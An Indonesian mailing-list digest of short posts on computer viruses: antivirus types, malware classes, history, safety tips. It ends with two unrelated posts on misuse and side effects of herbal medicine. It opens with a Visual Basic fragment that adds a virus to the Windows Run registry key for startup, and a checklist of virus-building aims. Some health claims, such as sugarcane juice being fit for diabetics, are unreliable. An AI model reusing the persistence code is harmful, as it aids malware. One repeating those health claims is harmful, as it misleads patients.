&#8220;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\virusku",
environ$("windir") & "\" & app.EXEName
Set WShell = Nothing


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Teknik Pembuatan Virus Komputer

Syarat sebuah virus computer :
1. Menyembunyikan prosesnya dari pemakai
2. Mengaktifkan dirinya setiap startup sistem
3. Menyebarkan dirinya melalui media file executable
4. Mempercepat proses penyebarannya melalui media
pertukaran data dan informasi
5. Mempercepat penyebarannya dengan memanfaatkan kelemahan
dari suatu system
6. Menyebarkan dirinya dengan filename spoofing.
7. Mempercepat proses penyebarannya dengan pendekatan
social engineering
8. Berusaha mempertahankan existensi dirinya
Tanpa menggunakan teori yang panjang dan lebar, kita akan
membahas bagaimana hal
tersebut diatas dapat dilakukan dengan menggunakan bahasa
pemrograman Visual Basic.


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Anti Virus Software

Anti-virus software adalah sebuah program komputer yang
digunakan untuk
memeriksa file-file dengan tujuan mengidentifikasi dan
menghapus virus komputer dan
malware lainnya.
Pada saat ini ada tiga jenis teknologi anti virus yang
lazimnya digunakan, yaitu:
scanners, monitors, dan integrity checkers.
1.4.1 Scanners
Scanners adalah program yang memeriksa file&#8211;file
executable untuk menemukan
rangkaian kode yang merupakan bagian dari komputer virus
yang telah diketahui
sebelumnya. Pada saat ini scanners adalah jenis program
anti virus yang paling banyak
digunakan dengan alasan kemudahan dalam proses maintenance
(pemeliharaan).
Pada dasarnya scanners terdiri atas:
Search Engine
Database yang berisi rangkaian kode sekuensial dari virus
yang telah diketahui
sebelumnya (sering kali disebut juga virus signatures atau
scan strings).
Jika sebuah virus baru ditemukan, maka database akan
di-update dengan signature
yang dimiliki hanya oleh virus tersebut dan tidak terdapat
di dalam program lainnya. Hal ini
dapat dilakukan tanpa memerlukan pemahaman yang lebih jauh
mengenai virus tersebut.
Beberapa kelemahan yang dimiliki scannners adalah:
Scanners harus tetap dijaga agar up-to-date secara terus
menerus karena scanners
hanya dapat mendeteksi virus yang telah diketahui
sebelumnya.Page 9

Virus Komputer: Sejarah dan Perkembangannnya
6
Scanners cenderung rentan terhadap virus polymorphic yang
memiliki kemampuan
untuk mengubah/mengkodekan dirinya sendiri sehingga
terlihat berbeda pada setiap
file yang terinfeksi. Hal ini dapat diatasi dengan
memahami mutation engine yang
terdapat di dalam virus tersebut secara mendetail.
Proses scanning yang dilakukan dalam mendeteksi keberadaan
virus-virus cenderung
bersifat time-consuming, mengingat keberadaan virus-virus,
worms, dan trojan
horses dengan jumlah yang luar biasa banyaknya.
1.4.2 Monitors
Monitors adalah program yang &#8216;tinggal&#8217;
(besifat residensial) di dalam memory
komputer untuk secara terus menerus memonitor fungsi dari
sistem operasi yang bekerja.
Pendeteksian sebuah virus dilakukan dengan memonitor
fungsi-fungsi yang diindikasikan
berbahaya dan memiliki sifat seperti sebuah virus, seperti
merubah isi dari sebuah file yang
executable dan tindakan-tindakan yang mem-bypass sistem
operas. Ketika sebuah program
mencoba melakukan hal-hal di atas, maka monitors akan
memblok eksekusi dari program
tersebut.
Tidak seperti halnya scanners, monitors tidak memerlukan
update secara terus
menerus. Namun kelemahan utama dari monitors adalah
kerentanan terhadap virus tuneling
yang memiliki kemampuan untuk mem-bypass program monitors.
Hal ini dikarenakan pada
sistem operasi PC pada umumnya, sebuah program yang sedang
dieksekusi (termasuk
sebuah virus) memiliki akses penuh untuk membaca dan
mengubah daerah manapun di
dalam memori komputer bahkan yang merupakan bagian dari
sistem operasi tersebut
sehingga monitors yang juga merupakan bagian dari memori
komputer dapat dilumpuhkan.
Kelemahan porgram monitors lainnya adalah kesalahan yang
kerap kali dilakukannya
mengingat pendeteksian virus didasarkan pada
kelakuan-kelakuan seperti yang disebutkan di
atas, sehingga kerap kali fungsi dari sebuah program lain
(yang bukan merupakan virus
komputer) dianggap sebagai sebuah virus.
1.4.3 Integrity Checkers
Integrity checkers adalah program yang mampu mendeteksi
objek executable lain
yang telah dimodifikasi dan mendeteksi infeksi dari sebuah
virus. Integrity checkers bekerja
dengan cara menghitung checksum (menghitung integritas)
dari kode-kode program yang
executable dan menyimpannya di dalam sebuah database.
Kemudian secara periodik
checksum dari program-program tersebut akan dihitung ulang
dan dibandingkan dengan
database checksum tersebut. Beberapa pakar menilai bahwa
database checksum ini harus Page 10

Virus Komputer: Sejarah dan Perkembangannnya
7
dilalui proses kriptografi setelah proses perhitungan
checksum selesai, untuk menghindari
usaha modifikasi yang dapat dilakukan oleh virus komputer.
Pada saat ini terdapat beberapa jenis integrity checkers:
Off-line integerity checkers: perlu di-run terlebih dahulu
untuk memeriksa checksum
dari seluruh kode executable yang terdapat di dalam sistem
komputer ybs.
Integrity checkers yang bekerja dengan cara membuat
modul-modul yang akan di-
attach pada file executable dengan bantuan program khusus
tertentu. Sehingga bila
file executable tersebut dijalankan, ia akan melakukan
proses perhitungan checksum-
nya sendiri. Namun hal ini memiliki kekurangan karena
tidak seluruh file executable
dapat diperlakukan seperti ini, dan integrity checkers
jenis ini dapat dengan mudah
di-bypass oleh virus steath.
Jenis terakhir dari integrity checkers yang bersifat
residensial (mendiami) memori dan
akan melakukan perhitungan ketika objek executable
dieksekusi.
Integrity checkers tidak bersifat virus-specific sehingga
tidak memerlukan update
secara terus menerus seperti scanners. Selain itu karena
integrity checkers tidak berusaha
memblok kerja dari virus komputer seperti halnya monitors,
maka integrity checkers tidak
dapat di-bypass oleh virus tunneling.
Beberapa kekurangan yang dimiliki integrity checkers:
Integrity checkers tidak memiliki kemampuan untuk mencegah
proses penginfeksian
oleh sebuah virus. Ia hanya dapat mendeteksi dan
melaporkan hasil pendeteksian
yang dilakukannya tersebut.
Integrity checkers pertama kali harus di sistem yang bebas
virus, jika tidak maka
hasil perhitungan pertama yang dilakukannya merupakan
hasil perhitungan yang
telah terinfeksi. Sehingga pada umumnya, pada saat proses
peng-install-an program
integrity checkers dilengkapi dengan scanners untuk
memastikan sistem bebas virus.
Integrity checkers rentan terhadap false positive (kesalah
indikasi keberadaan virus
pada program yang sebenarnya bebas virus) , karena
integrity checkers mendeteksi
perubahan bukan virus.
Integrity checkers tidak dapat mendeteksi sumber dari
infeksi virus, walaupun dapat
mendeteksi proses penyebaran virus dan mengidentifikasi
objek yang baru terinfeksi.
Integrity checkers rentan terhadap slow viruses, karena
slow virus menginfeksi file
target ketika file tersebut ditulis ke dalam disk. Page 11

Virus Komputer: Sejarah dan Perkembangannnya
8
Meskipun adanya kekurangan-kekurangan di atas, banyak
pakar menganggap
integrity checkers sebagai pertahanan yang paling baik
terhadap ancaman virus komputer
dan malware lainnya.


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Klasifikasi Virus Komputer

Virus komputer dan program lain yang membahayakan sistem
komputer dapat
diklsifikasikan ke dalam beberapa kelompok menurut
bagaimana cara mereka untuk
menjangkiti (infect) sebuah sistem komputer, bagian dari
sistem komputer yang mereka
jangkiti, atau kelakuan (behaviour) yang dimiliki oleh
mereka. Namun pada dasarnya definisi
dan klasifikasi mengenai kode-kode program berbahaya ini
masih rancu dan menjadi
kontroversi bagi banyak orang bahkan bagi orang yang
memang mendalami bidang
komputer.
Berikut adalah contoh klasifikasi dari berbagai jenis
harmful program [3]:
Malware: merupakan singkatan dari malicious software,
merujuk pada program yang
dibuat dengan tujuan membahayakan atau menyerang sebuah
sistem komputer.
Terdiri atas virus komputer (computer viruses), computer
worms, trojan horses, joke
programs dan malicious toolkits.
Computer virus: merujuk pada program yang memiliki
kemampuan untuk bereplikasi
dengan sendirinya.
Computer worm: merujuk pada program independen yang
memiliki kemampuan
untuk bereplikasi dengan sendirinya. Indepen di sini
memiliki makna bahwa worm
tidak memiliki host program sebagaimana virus, untuk
ditumpangi. Sering kali worm
dikelompokan sebagai sub-kelas dari virus komputer.
Trojan horse: merujuk pada program independen yang dapat
mempunyai fungsi yang
tampaknya berguna, dan ketika dieksekusi, tanpa
sepengetahuan pengguna, juga
melaksanakan fungsi-fungsi yang bersifat destruktif.
Malicious toolkits: merujuk pada program yang didesain
untuk membantu
menciptakan program-program yang dapat membahyakan sebuah
sistem komputer.
Contoh dari program jenis ini adalah tool pembuat virus
dan program yang dibuat
untuk membantu proses hacking.
Joke program: merujuk pada program yang meniru
operasi-operasi yang dapat
membahayakan sistem komputer, namun sebenarnya dibuat
untuk tujuan lelucon
dan tidak mengandung operasi berbahaya apapun.


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Sejarah Virus Komputer

Berikut adalah sekilas sejarah mengenai virus komputer
[5].
1981 Virus &#8216;in the wild&#8217; pertama ditemukan.
Virus yang bernama Elk Cloner ini menyebar
melalui floppy disk pada komputer Apple II.
1983 Fred Cohen dalam paper-nya yang berjudul
&#8216;Computer Viruses &#8211; Theory and
Experiments&#8217; memberikan definisi pertama mengenai
virus komputer dan
memaparkan eksperimen yang telah dilakukannya untuk
membuktikan konsep dari
sebuah virus komputer. Bersama dengan Len Adelman, ia
menciptakan sebuah
contoh virus pada komputer VAX 11/750 dengan sistem
operasi Unix. Page 5

Virus Komputer: Sejarah dan Perkembangannnya
2
1986 Sepasang kakak adik dari Pakistan, Basit dan Amjad,
menciptakan sebuah boot
sector virus pertama yang diberi nama Brain. Brain sering
kali disebut sebagai virus
komputer pertama di dunia.
PC-based Trojan pertama diciptakan dalam bentuk program
shareware yang diberi
nama PC-Write.
Dalam beberapa laporan disebutkan bahwa file virus
pertama, Virdem, juga
ditemukan pada tahun yang sama. Virdem diciptakan oleh
Ralf Burger.
1987 Virus-virus file infector seperti Leigh mulai
bermunculan, kebanyakan menyerang
file COM seperti COMMAND.COM. Pada tahun yang sama muncul
virus penyerang
file-file EXE pertama, Suriv 01 dan 02 serta Jerusalem.
Mainframe IBM mengalami serangan worm IBM Christmas Worm
dengan
kecepatan replikasi setengah juta kopi per jam.
1988 Virus pertama yang menyerang komputer Macintosh,
MacMag dan Scores, muncul.
Pada tahun yang sama didirikan CERT (Computer Emergency
Response Team)
oleh DARPA dengan tujuan awalnya untuk mengatasi serangan
Morris Worm yang
diciptakan oleh Robert Morris.
1989 AIDS Trojan muncul sebagai trojan yang menggunakan
samaran sebagai AIDS
information program. Ketika dijalankan trojan ini akan
mengenkripsi hard drive dan
meminta pembayaran untuk kunci dekripsinya.
1990 Virus Exchange Factory (VX) BBS yang merupakan forum
diskusi online para
pencipta virus didirikan di Bulgaria.
Mark Ludwig menulis buku &#8220;The Little Black Book of
Computer Viruses&#8221; yang berisi
cara-cara untuk menciptakan berbagai jenis virus komputer.
1991 Virus polymorphic pertama, Tequila, muncul di Swiss.
Virus ini dapat mengubah
dirinya untuk menghindari deteksi.
1992 Kehadiran virus Michaelangelo yang menjadi ancaman
bagi seluruh dunia, namun
demikian kerusakan yang ditimbulkan pada akhirnya tidak
terlalu hebat.
Kemuculan beberapa tool yang dapat digunakan untuk
menciptakan virus seperti
Dark Avenger Mutation Engine (DAME) yang dapat mengubah
virus apa pun
menjadi virus polymorphic, dan Virus Creation Lab (VCL)
yang merupakan kit
pertama yang dapat digunakan untuk menciptakan virus
(lihat Gambar 1.1).
1995 Para hacker dengan nama &#8216;Internet Liberation
Front&#8217; melakukan banyak serangan
pada hari Thanksgiving. Beberapa badan yang menjadi korban
serangan ini adalah
Griffith Air Force Base, Korean Atomic Research Institute,
NASA, GE, IBM, dll. Virus
macro pertama yang menyerang aplikasi Microsoft Word,
Concept, dikembangkan.Page 6

Virus Komputer: Sejarah dan Perkembangannnya
3
Gambar 1.1 Tampilan Virus Creation Lab (VCL).
1996 Kemunculan virus Boza yang didesain khusus untuk
menyerang file-file Windows
95, virus Laroux yang merupakan virus penyerang Microsoft
Excel pertama, virus
Staog yang merupakan virus Linux pertama.
1998 Kemunculan virus Java pertama, Strange Brew.
Back Orifice merupakan trojan pertama yang dapat digunakan
sebagai tool untuk
mengambil alih kendali komputer remote melalui Internet.
Pada tahun ini, virus-virus macro lainnya bermunculan.
1999 Kemunculan virus Melissa yang merupakan kombinasi
antara virus macro yang
menyerang aplikasi Microsoft Word dan worm yang
menggunakan address book
pada aplikasi Microsoft Outlook dan Oulook Express untuk
mengirimkan dirinya
sendiri melalui email.
Virus Corner merupakan virus pertama menyerang file-file
aplikasi MS Project.
Virus Tristate merupakan virus macro yang bersifat
multi-program menyerang
aplikasi Microsoft Word, Excel, dan PowerPoint.
Bubbleboy merupakan worm pertama yang dapat aktif hanya
dengan membuka
email melalui aplikasi Microsoft Outlook tanpa memerlukan
attachment.
2000 Serangan Distributed Denial of Service (DDoS) pertama
membuat kerusakan pada
situs-situs besar seperti Yahoo!, Amazon.com, dan
lain-lain.
Love Letter merupakan worm dengan kecepatan menyebar
tertinggi pada saat itu
yang menyebabkan kerusakan pada banyak sistem email di
seluruh dunia.
Liberty Crack yang merupakan worm pertama untuk peralatan
PDA.
2001 Gnuman (Mandragore) merupakan worm pertama yang
menyerang jaringan
komunikasi peer to peer. Worm ini menyamarkan diri dalam
bentuk file MP3 yang
dapat di download.
Kemunculan virus yang didesain untuk menyerang baik sistem
operasi Windows
maupun Linux, seperti Winux atau Lindose. Page 7

Virus Komputer: Sejarah dan Perkembangannnya
4
Virus LogoLogic-A menyebar melalui aplikasi MIRC dan
e-mail.
2002 Virus LFM-926 merupakan virus pertama yang menyerang
file-file aplikasi
Shockwave Flash.
Donut merupakan worm pertama yang menyerang .NET services.
SQLSpider merupakan worm yang menyerang aplikasi yang
menggunakan
teknologi Microsoft SQL Server


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Tip Aman dari Virus

Pasang Anti Virus pada sistem anda
Sebagai perlindungan di garis depan, penggunaan anti virus
adalah wajib. Ada banyak anti
virus yang beredar di pasaran saat ini. Beberapa yang
cukup handal diantaranya adalah
McAfree VirusScan (www.mcafee.com) dan Norton Anti Virus
(www.symantec.com).
&#8226;
Update database program anti virus secara teratur
Ratusan virus baru muncul setiap bulannya. Usahakan untuk
selalu meng-update database
dari program anti virus yang anda gunakan. Database
terbaru dapat dilihat pada website
perusahaan pembuat program anti virus yang anda gunakan.
&#8226;
Pergunakan Firewall Personal, dengan menggunakan firewall
maka akses yang akan keluar
masuk ke system kita dapat diatur, apakah paket data
disetujui atau ditolak.
&#8226;
Berhati-hati sebelum menjalankan file baru
Lakukan scanning terlebih dahulu dengan anti virus sebelum
menjalankan sebuah file yang
didapat dari mendownload di internet atau mengkopi dari
orang lain. Apabila anda biasa
menggunakan sarana e-mail, berhati-hatilah setiap menerima
attachment dalam bentuk
file executable. Waspadai file-file yang berekstensi:
*.COM, *.EXE, *.VBS, *.SCR, *.VB.
Jangan terkecoh untuk langsung membukanya sebelum
melakukan scanning dengan
software anti virus.
&#8226;
Curigai apabila terjadi keanehan pada sistem anda
Menurunnya performa sistem secara drastis, khususnya saat
melakukan operasi
pembacaan/penulisan file di disk, serta munculnya masalah
pada software saat
dioperasikan bisa jadi merupakan indikasi bahwa sistem
telah terinfeksi oleh virus. Berhati-
hatilah!
&#8226;
Backup data anda secara teratur
Tips ini mungkin tidak secara langsung menyelamatkan data
anda dari ancaman virus,
namun demikian akan sangat berguna apabila suatu saat
virus betul-betul menyerang dan
merusak data di komputer yang anda gunakan. Setidaknya
dalam kondisi tersebut, anda
tidak akan kehilangan seluruh data yang telah anda backup
sebelumnya


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Ciri-ciri terinfeksi Virus

Wah ada banyak sih gejala-gejalanya, biasanya jika virus
sudah menginfeksi dampak
langsungnya adalah file kita yang rusak atau hilang entah
kemana, virus dapat mengatur
computer kita atau menggangu system operasi misalnya
melakukan restart, sering terjadi crash
atau hang, kinerja atau performa pc yang sangat lambat.
Page 3

TalkShowComputerEasy
DerisStiawan
3
Kalau computer kita terkoneksi ke internet lewat jaringan
LAN, maka koneksinya akan lambat
sekalai bahkan terputus. Jika kita memeriksa bandwidthnya
maka akan terlihat anomaly
bandwidth yang sedangkan kita tidak menggunakannya.


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Bahaya Virus

Ada banyak sekali cerita dan kasus yang disebabkan oleh
virus, worm ataupun Trojan.
Contohnya kasus virus macro yang menjangkiti doc Microsoft
word. Virus CIH yang dibuat untuk
merusak system BIOS, virus ini diperkirakan telah merusak
ribuan computer didunia.
Virus Mail My Love yang menggegerkan dunia Kasus Worm
tercatat yang paling banyak
ditemukan, contoh kasus terbesar yaitu Worm Nimda, Sircam
dan Code Red dengan variannya
yang membuat macem situs dan jaringan LAN perusahaan
didunia, dimana worm tersebut
melakukan komunikasi palsu yang menyebabkan jaringan
tersendat. Nimda merupakan
kebalikan dari Admin.
Di awal 2003 ini, virus worm Slammer hanya membutuhkan
waktu 10 menit untuk membuat
chaos pengguna internet. Dalam menit pertama
penyebarannya, jumlah virus Slammer berlipat
dua kali setiap 8,5 detik. Kecepatannya jauh di atas worm
Code Red - yang menyebar 18 bulan
lalu - yang berlipat dua setiap 37 menit.
Sobig dengan variannya yang telah membuat beberapa ISP
dunia macet karena banjirnya
badwidth yang anomaly, dimana worm tersebut melakukan
pengiriman code secara simultan
lewat email dengan membaca semua alamat email kita yang
ada di outlook express.
Seperti juga penyakit yang kita kenal, pastilah virus
computer ini mempunyai cara untuk
menulari computer ?
Yap benar sekali, sebelumnya saya ingin mengambarkan cara
kerja Worm. Cerdik karena ia
mampu mengelabui scanning heuristic antivirus dan tidak
terlalu ganas.Worm biasanya
Menyebar melalui Email, Menyebar melaui network, dan
Menyebar melalui IIS seperti BlueCode
/ Code Red.
Ada banyak cara sebuah MalCodes ini menginfeksi computer
korban, diantaranya
&#8226;
Disk, media satu ini yang sering menularkan virus, kita
memindahkan file-file dari computer
lain tanpa kita lakukan scanning dulu. Mungkin saja file
dari luar sudah terinfeksi.
&#8226;
Email, dengan metode attachement sebuah virus dapat
menulari computer setelah
attachment email kita buka, biasanya virus disusupkan
dengan file lain layaknya sebuah file
biasa atau gambar
&#8226;
Download, biasanya kita mendownload software-software dari
internet, apalagi
mendownload dari situs yang tidak terkanal, kemungkinan
sangat besar kita dapat terkena
jenis virus worm atau Trojan


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Perkembangan Virus Computer

Dalam perkembangannya virus sangat cepat sekali, Kode
perusak ini dapat digolongkan dalam 3
macam golongan: virus, worm dan Trojan Horses, serta
beberapa program yang memiliki bug.
&#8226;
Virus, Virus memiliki kemampuan jahat untuk mereproduksi
diri mereka sendiri dan terdiri
dari kumpulan kode yang dapat memodifikasi target kode
yang sedang berjalan, atau dapat
pula memodifikasi struktur internal target kode, sehingga
target kode sebelum berjalan
dipaksa menjalankan virus.
&#8226;
Virus sering menampilkan pesan yang tidak disukai, merusak
tampilan display, menghapus
memory C-MOS, merusak informasi dalam hard disk dll. Efek
yang ditimbulkan virus
mengalami perkembangan yang cukup serius akhir-akhir ini.
Contoh virus: Brain, Ohe half,
Die hard, XM/Laroux, Win95/CIH ,
&#8226;
Worm, Worm ditujukan kepada program yang mengkopi dirinya
sendiri ke HANYA memory
komputer. Perbedaan mendasar dari worm dan virus adalah,
apakah menginfeksi target
code atau tidak. Virus menginfeksi target code, tetapi
worm tidak. Worm hanya tinggal di
memory.
&#8226;
Worm dapat dengan cepat memperbanyak diri dan biasanya
dilakukan pada media LAN atau
Internet, resources jaringan yang terinfeksi akan habis
bandwidthnya dibanjiri oleh worm
yang akan mengakibatkan melambatnya aliran data. Contoh
worm: I-Worm/Happy99(Ska),
I-Worm/ExploreZIP, Sobig, Nimda, Code Red, Sircam. Page 2

TalkShowComputerEasy
DerisStiawan
2
&#8226;
Worm umumnya berbentuk file executable (berekstensi .EXE
atau .SCR), yang terlampir
(attach) pada email. Namun demikian, ada beberapa jenis
worm yang berbentuk script
yang ditulis dalam bahasa Visual Basic (VBScript).
&#8226;
Trojan Horse diproduksi dengan tujuan jahat. Konsep yang
digunakan seperti pada zaman
romawi kuno, Berbeda dengan virus, Trojan Horse tidak
dapat memproduksi diri sendiri.
Pada umumnya, mereka dibawa oleh utility program lainnya.
Utility program tersebut
mengandung dirinya, atau Trojan Horse itu sendiri
ber"lagak" sebagai utility program.
Contoh
Trojan
Horse:
Win-Trojan/Back
Orifice,
Win-Trojan/SubSeven,
Win-
Trojan/Ecokys(Korean


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

PENYALAHGUNAAN OBAT TRADISIONAL/TANAMAN OBAT

Sebagaimana halnya obat-obat sintesis, OT/TO pun
seringkali disalah gunakan
oleh oknum tertentu baik untuk pemakaian sendiri maupun
ditujukan kepada orang lain
dengan maksud-maksdu tertentu. Bila pada obat-obat
sintesis sering diinformasikan
adanya penyalah gunaan obat-obat golongan psikotropika
(obat tidur,
penenang/tranquilizer), maka pada OT penyalah gunaan itu
juga dilakukan dengan
berbagai kasus. Diantaranya yang sering terjadi adalah
kasus penyalah gunaan cara
pemakaian (seperti daun ganja, candu untuk dicampur dengan
rokok, seduhan kecubung
untuk flay dsb.), juga tujuan pemakaian (misalnya jamu
terlambat bulan dicampur
dengan jamu pegel linu untuk abortus) dan yang lebih luas
lagi adalah penyalah gunaan
pada proses penyiapan/produksi dengan cara menambahkan zat
kimia tertentu/obat
keras untuk mempercepat dan mempertajam khasiat/efek
farmakologisnya sehingga
dikatakan jamunya &#8216;lebih manjur, mujarab,
ces-pleng&#8217; dan lain-lain.
Tentu masih segar pada ingatan kita terhadap kasus jamu
yang dicampur obat
keras di Cilacap dan banyumas yang kemudian ketahuan dan
dicabut &#8216;registrasi&#8217;nya
oleh Badan POM (Kompas, Nov.2001). Adapun obat-obat keras
yang sering
ditambahkan pada jamu/OT antara lain : fenilbutazon,
antalgin, deksametason (untuk
jamu pegel linu); parasetamol, CTM, coffein (untuk jamu
masuk angin dan sejenisnya);
teofilin, prednison (untuk sesak nafas), furosemid (untuk
pelangsing) dan lain
sebagainya. Pada hal zat-zat kimia tersebut bisa
menimbulkan dampak negatip yang
membahayakan kesehatan; sebagai contoh fenilbutazon bisa
menyebabkan pendarahan
lambung dan merusak hati, antalgin bisa menyebabkan
granulositosis atau kelainan
darah dan prednison menyebabkan pembengkakan wajah dan
gangguan ginjal.
Pada kasus lain, ada juga penyalahgunaan OT dengan cara
dioplos bersama
produk lain yang beralkohol (seperti konsumsi anggur jamu
yang umumnya dilakukan
oleh para remaja). Hal ini bukan hanya menyebabkan
penyakit hati yang parah, tetapi
dapat menyebabkan kematian karena dicampur bahan lain yang
berbahaya. Demikian
juga dengan minum jamu terlambat bulan pada dosis berlebih
(seperti yang sering
dilakukan sebagian remaja putri untuk abortus). Memang
bukan menjadi rahasia lagi
bahwa salah satu cara untuk menjarangkan kehamilan
masyarakat Indonesia (khususnya
Jawa) dengan minum jamu terlambat bulan; akan tetapi hal
ini sering disalah gunakan
oleh para remaja putri setelah mengetahui akibat
perbuatannya yang diluar kontrol
membuahkan keterlambatan menstruasi lebih dari 2 bulan.
Terlepas dari segi moral dan
agama yang jelas-jelas melaknat perbuatan ini, dari segi
fisik jika calon bayi yang ingin
digugurkan telah cukup besar dan tidak meninggal dapat
terjadi kecacatan tubuh secara
permanen akan disandang oleh bayi yang tak berdosa
tersebut.


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

EFEK SAMPING TANAMAN OBAT/OBAT TRADISIONAL

Dari definisi Obat Tradisional yang telah direkomendasikan
Depkes
(sebagaimana disebutkan pada awal tulisan ini) terdapat
kalimat &#8220;&#8230;yang secara
tradisional digunakan untuk pengobatan berdasarkan
pengalaman&#8221;. Pada kata &#8216;secara
tradisional&#8217; tersirat makna bahwa segala aspeknya
(jenis bahan, cara menyiapkan,
takaran serta waktu dan cara penggunaan) harus sesuai
dengan warisan turun-temurun
sejak nenek moyang kita. Penyimpangan terhadap salah satu
aspek kemungkinan dapat
menyebabkan ramuan OT tersebut yang asalnya aman menjadi
tidak aman atau
berbahaya bagi kesehatan. Pada hal jika diperhatikan,
seiring perkembangan jaman
banyak sekali hal-hal tradisional yang telah bergeser
mengalami penyempurnaan agar
lebih mudah dikerjakan ulang oleh siapapun. Misalnya
tentang peralatan untuk merebus
jamu, dulu masih menggunakan kwali dari tanah liat
sekarang sudah beralih ke panci
dari aluminium, untuk menumbuk sudah menggunakan alat-alat
dari logam dan tidak
lagi menggunakan alu dari kayu atau batu, dan lain
sebagainya.
Disamping itu perlu disadari pula bahwa memang ada bahan
ramuan OT yang
baru diketahui berbahaya, setelah melewati beragam
penelitian, demikian juga adanya
ramuan bahan-bahan yang bersifat keras dan jarang
digunakan selain untuk penyakit-
penyakit tertentu dengan cara-cara tertentu pula. Secara
toksikologi bahan yang
berbahaya adalah suatu bahan (baik alami atau sintesis,
organik maupun anorganik)
yang karena komposisinya dalam keadaan, jumlah, dosis dan
bentuk tertentu dapat
mempengaruhi fungsi organ tubuh manusia atau hewan
sedemikian sehingga
mengganggu kesehatan baik sementara, tetap atau sampai
menyebabkan kematian.
Suatu bahan yang dalam dosis kecil saja sudah menimbulkan
gangguan, akan lebih
berbahaya daripada bahan yang baru dapat mengganggu
kesehatan dalam dosis besar.
Akan tetapi bahan yang aman pada dosis kecil kemungkinan
dapat berbahaya atau
toksis jika digunakan dalam dosis besar dan atau waktu
lama, demikian juga bila tidak
tepat cara dan waktu penggunaannya. Jadi tidak benar, bila
dikatakan OT/TO itu tidak
memiliki efek samping, sekecil apapun efek samping
tersebut tetap ada; namun hal itu Page 8

bisa diminimalkan jika diperoleh informasi yang cukup. Ada
beberapa contoh, antara
lain mrica (Piperis sp.) pada satu sisi baik untuk
diabetes, tetapi mrica juga berefek
menaikkan tekanan darah; sehingga bagi penderita diabet
sekaligus hipertensi
dianjurkan tidak memasukkan mrica dalam ramuan jamu/OT
yang dikonsumsi. Kencur
(Kaempferia galanga) memang bermanfaat menekan batuk,
tetapi juga berdampak
meningkatkan tekanan darah; sehingga bagi penderita
hipertensi sebaik-nya tidak
dianjurkan minum beras-kencur. Demikian juga dengan
brotowali (Tinospora sp.) yang
dinyatakan memiliki efek samping dapat mengganggu
kehamilan dan menghambat
pertumbuhan plasenta.
Walaupun demikian efek samping TO/OT tentu tidak bisa
disamakan dengan
efek samping obat modern. Pada TO terdapat suatu mekanisme
yang disebut-sebut
sebagai penangkal atau dapat menetralkan efek samping
tersebut, yang dikenal dengan
SEES (Side Effect Eleminating Subtanted). Sebagai contoh
di dalam kunyit terdapat
senyawa yang merugikan tubuh, tetapi di dalam kunyit itu
juga ada zat anti untuk
menekan dampak negativ tersebut. Pada perasan air tebu
terdapat senyawa Saccharant
yang ternyata berfungsi sebagai antidiabetes, maka untuk
penderita diabet (kencing
manis) bisa mengkonsumsi air perasan tebu, tetapi dilarang
minum gula walaupun gula
merupakan hasil pemurnian dari tebu.
Selain yang telah disebutkan diatas, ada beberapa tanaman
obat/ramuan yang
memang berefek keras atau mempunyai efek samping berbahaya
terhadap salah satu
organ tubuh. Selengkapnya TO tersebut seperti tersaji pada
tabel berikut :
Tanaman Obat/Ramuan OT yang berefek keras
(mempunyai efek samping berbahaya)
N
O
EFEK TERHADAP
CONTOH TANAMAN OBAT
1. Jantung
Daun digitalis, daun oleander, daun senggunggu
2. Susunan syaraf otonom
Umbi gadung, biji saga, daun dan buah kecubung,
daun gigil, biji jarak, daun tuba
3. Susunan Syaraf Pusat
Daun koka
4. Sistem Pencernaan
Biji ceguk, daun widuri
5. Saluran Pernafasan
Kulit buah jambu monyet
6. Sistem Reproduksi
Wanita (Abortivum)
Jungrahap, jarong, daun maja, akar kelor, buah
nanas muda
7. Sistem Reproduksi Pria penurun libido => biji kapas
melemahkan spermatozoa => biji pare
8. Saluran Kencing
&#8226; Diuretik kuat => daun keji beling, meniran
&#8226; Memacu batu ginjal => bayam, kubis, nenas
9. Hati/Lever
Konfrei, arak, daun imba
10. Meningkatkan kadar asam
urat darah
Mlinjo, kacang-kacangan
11. Menurunkan Jumlah Sel
Darah Putih
Ochrosia spp.
